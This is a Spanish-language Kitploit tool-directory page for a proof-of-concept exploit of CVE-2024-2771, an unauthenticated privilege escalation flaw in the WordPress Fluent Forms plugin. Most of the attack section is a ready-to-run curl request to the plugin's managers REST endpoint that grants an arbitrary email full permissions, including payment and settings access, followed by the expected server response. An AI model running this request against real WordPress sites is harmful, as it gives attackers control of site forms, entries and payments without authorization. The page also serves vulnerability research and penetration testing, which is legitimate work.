Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-2771-PoC — Exploit de prueba de concepto para CVE-2024-2771, una vulnerabilidad de escalada de privilegios en el plugin Fluent Forms de WordPress a través de un endpoint de REST API no autenticado. | Kitploit
Herramientas/GitHubGitHub/whale93/cve-2024-2771-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubwhale93/cve-2024-2771-poc

CVE-2024-2771-PoC

Exploit de prueba de concepto para CVE-2024-2771, una vulnerabilidad de escalada de privilegios en el plugin Fluent Forms de WordPress a través de un endpoint de REST API no autenticado.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-2771-PoC

CVE-2024-2771 Prueba de concepto

El plugin Contact Form by Fluent Forms para Quiz, Survey y Drag & Drop WP Form Builder para WordPress es vulnerable a la escalada de privilegios debido a la falta de una comprobación de capacidades en el endpoint de la API REST /wp-json/fluentform/v1/managers en todas las versiones hasta la 5.1.16 incluida. Esto permite que atacantes no autenticados concedan a usuarios permisos de gestión de Fluent Forms, lo que les da acceso a todos los ajustes y funciones del plugin. Esto también permite que atacantes no autenticados eliminen cuentas de administrador.

Requisitos previos

  • Sitio WordPress con Contact Form – Fluent Forms ≤ 5.1.16 activo.
  • El atacante puede acceder a la API REST del sitio (no se necesita autenticación).

Comando de explotación

root@kitploit:~
# 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
     -H "Content-Type: application/json" \
     -d '{
           "manager": {
             "email": "[email protected]",
             "permissions": [
               "fluentform_dashboard_access",
               "fluentform_forms_manager",
               "fluentform_entries_viewer",
               "fluentform_manage_entries",
               "fluentform_view_payments",
               "fluentform_manage_payments",
               "fluentform_settings_manager",
               "fluentform_full_access"
             ]
           }
         }'

Respuesta esperada

root@kitploit:~
HTTP/1.1 200 OK
{
  "message": "Manager has been saved.",
  "manager": {
    "id": 2,
    "email": "[email protected]",
    "permissions": [
      "fluentform_dashboard_access",
      "fluentform_forms_manager",
      "fluentform_entries_viewer",
      "fluentform_manage_entries",
      "fluentform_view_payments",
      "fluentform_manage_payments",
      "fluentform_settings_manager",
      "fluentform_full_access"
    ]
  }
}

Captura de pantalla Screenshot 2025-08-01 105801

Descargar herramienta